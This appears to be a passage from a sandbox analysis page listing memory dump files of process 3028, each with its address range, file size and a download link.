memory/3028-93-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-89-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-84-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-85-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-86-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-87-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-83-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/3028-73-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-75-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-88-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-81-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-71-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-111-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3028-114-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3028-115-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3028-116-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-118-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-117-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-119-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-122-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-121-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-125-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-126-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download